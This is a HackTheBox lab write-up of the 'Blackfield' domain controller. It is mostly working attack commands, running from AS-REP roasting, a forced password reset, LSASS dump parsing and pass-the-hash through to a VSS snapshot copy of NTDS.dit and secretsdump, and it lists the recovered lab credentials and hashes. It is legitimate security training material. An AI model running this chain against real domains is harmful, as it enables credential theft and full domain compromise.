Box Info
| Platform | HackTheBox |
| Difficulty | Hard |
| OS | Windows (Domain Controller) |
| Key Techniques | AS-REP Roasting, ForceChangePassword, LSASS Dump Analysis, VSS + NTDS.dit |
Attack Path Summary
SMB null session on profiles$ share → extracted ~300 potential usernames → AS-REP Roasted support account → cracked hash → BloodHound showed support has ForceChangePassword over audit2020 → changed password via rpcclient → audit2020 had access to forensic SMB share → found lsass.DMP → pypykatz extracted svc_backup NTLM hash → evil-winrm as svc_backup → SeBackupPrivilege → diskshadow VSS snapshot → robocopy /b NTDS.dit → secretsdump → Domain Admin.
Longest chain I’ve done. Every step built on the last one.
Enumeration
sudo nmap -sCV -p 53,88,135,389,445,593,3268,5985 -Pn -T4 $ip
| Port | Service | Notes |
|---|---|---|
| 88 | Kerberos | DC confirmed |
| 389 | LDAP | Domain: BLACKFIELD.local |
| 445 | SMB | Signing required |
| 5985 | WinRM | Used for shell |
SMB — Username Harvest
smbclient //$ip/profiles$ -U '' -N -c 'ls' | awk '{print $1}' | grep -v '^\.' | grep -v '^$' | grep -v 'blocks' > users.txt
# ~300 potential usernames from profiles$ share
Foothold — AS-REP Roasting
impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -usersfile users.txt -format hashcat -outputfile asrep.txt
# support account has no preauth → got hash
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# Cracked: #00^BlackKnight
First creds: support:#00^BlackKnight
BloodHound → ForceChangePassword
bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d BLACKFIELD.local -c All
# BloodHound: support has ForceChangePassword over audit2020
Changed audit2020’s password without knowing the original:
rpcclient -U 'support%#00^BlackKnight' $ip
rpcclient $> setuserinfo2 audit2020 23 'Password@1234'
Forensic Share → LSASS Dump
audit2020 had access to the forensic SMB share containing memory dumps.
smbclient //$ip/forensic -U 'BLACKFIELD.local/audit2020%Password@1234'
# Downloaded memory_analysis/lsass.DMP
# WARNING: .zip files were 0 bytes from corrupt mget — use the .DMP directly
Extracted credentials from the LSASS dump:
pypykatz lsa minidump lsass.DMP
# Got svc_backup NTLM hash: 9658d1d1dcd9250115e2205d9f48400d
evil-winrm -i $ip -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
Privilege Escalation — SeBackupPrivilege → NTDS.dit
svc_backup had SeBackupPrivilege and SeRestorePrivilege. On a DC, that means we can grab NTDS.dit — the domain password database.
The difference:
reg save hklm\sam= local account hashes. Works on any Windows box.- NTDS.dit = domain password database. Only on DCs. Locked by Active Directory — can’t copy it directly.
- VSS (Volume Shadow Copy) creates a frozen snapshot where NTDS.dit is no longer locked.
VSS Snapshot + NTDS.dit Copy
# Must run from a writable directory — NOT Documents
cd C:\Temp
echo "set context persistent nowriters" | out-file C:\Temp\shadow.dsh -encoding ascii
echo "add volume c: alias pwn" | out-file C:\Temp\shadow.dsh -append -encoding ascii
echo "create" | out-file C:\Temp\shadow.dsh -append -encoding ascii
echo "expose %pwn% z:" | out-file C:\Temp\shadow.dsh -append -encoding ascii
diskshadow /s C:\Temp\shadow.dsh
# Shadow copy created and exposed as Z:\
# Copy NTDS.dit using backup privilege (/b flag bypasses ACLs)
robocopy /b z:\Windows\NTDS\ C:\Temp\ ntds.dit
# Save SYSTEM hive
reg save hklm\system C:\Temp\system
# Download both
download ntds.dit
download system
Secretsdump → Domain Admin
impacket-secretsdump -ntds ntds.dit -system system LOCAL
# Got: Administrator:500:...:184fb5e5178480be64824d4cd53b99ee:::
evil-winrm -i $ip -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'
Credentials
| Username | Password/Hash | Source |
|---|---|---|
| support | #00^BlackKnight | AS-REP Roasting |
| audit2020 | Password@1234 | ForceChangePassword |
| svc_backup | 9658d1d1dcd9250115e2205d9f48400d (NTLM) | pypykatz on lsass.DMP |
| Administrator | 184fb5e5178480be64824d4cd53b99ee (NTLM) | secretsdump from NTDS.dit |
What I Learned
pypykatz — Linux equivalent of Mimikatz. Parses LSASS memory dumps offline. pypykatz lsa minidump lsass.DMP and you get credentials of every user who had a session on that machine.
VSS + NTDS.dit — on a DC, NTDS.dit is locked by AD. Use diskshadow to create a snapshot, expose it as a drive letter, then robocopy /b to copy with backup privileges.
ForceChangePassword via rpcclient — setuserinfo2 <user> 23 '<newpass>' changes any user’s password if you have the ACL right. You don’t need to know the original password.
SMB mget produces 0-byte files for large files sometimes. Always check file sizes. Use the .DMP directly instead of .zip.
diskshadow MUST run from a writable directory. Always cd C:\Temp first. Not Documents, not Desktop.
Pattern: “DC box + SeBackupPrivilege = VSS snapshot → robocopy /b NTDS.dit → secretsdump → all domain hashes.”